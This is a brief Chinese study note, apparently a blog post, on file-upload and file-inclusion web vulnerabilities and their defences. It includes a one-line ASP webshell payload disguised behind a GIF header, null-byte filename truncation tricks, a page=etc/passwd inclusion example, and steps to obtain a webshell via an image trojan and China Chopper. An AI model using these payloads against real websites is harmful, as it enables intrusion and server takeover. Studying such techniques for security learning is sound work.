文件上传
原理:对上传的文件未进行过滤,或者过滤不严,导致恶意文件被成功上传到网站。
防御:代码加强、WAF拦截、webshell查杀、正则搜索网站目录是否存在eval等敏感字段。
前端JS绕过
更改前端限制
burp抓包
MIME绕过
漏洞利用
文件头欺骗 gif89a <% eval request("pwd")%>fuckfuckfuckfuckfuck
filepath 就是IIS 6.0的目录解析漏洞。
Filename(00截断) 上传图片马c.jpg——抓包改成filename=c.php jpg——空格替换成Hex
上传图片马c.jpg——抓包改成filename=c.php%00jpg——将%00URL编码
filetype 篡改文件类型:修改mime类型 类型/子类型 Content-Type
强行添加表单提交按钮 <input type="submit" value="提交" name="bb">
文件包含
原理
.py文件中包含.py文件,一种常用的开发机制。对所包含的内容未进行过滤,或者过滤不严,导致恶意文件被成功执行(直接getshell)。
分类:本地文件包含、远程文件包含。
形式:page=etc/passwd、page=”url”
代码注入的一种,核心原理是黑客拥有变量的控制权。
文件包含漏洞可引发文件上传漏洞、命令执行漏洞。
PHP/JSP/ASP相关函数一览表
- PHP配置文件中的参数:
allow_url_include选项 定义本地文件包含开关
allow_url_fopen选项 定义远程文件包含开关
- JSP配置文件中的参数:
- ASP配置文件中的参数:
利用
图片马如何获取webshell?(使用图片马利用文件包含漏洞,获取webshell)
- 使用图片马工具edjpgcom将恶意代码插入图片中
- 上传
- 访问url?page=图片相对路径或者远程url/一句话木马.txt以执行该文件
- 即可生成一句话木马文件
- 中国菜刀连接
日志文件包含利用
攻击绕过:绕过过滤函数。
标签:web,包含,文件,url,漏洞,上传,图片 From: https://www.cnblogs.com/dustfree/p/17431598.html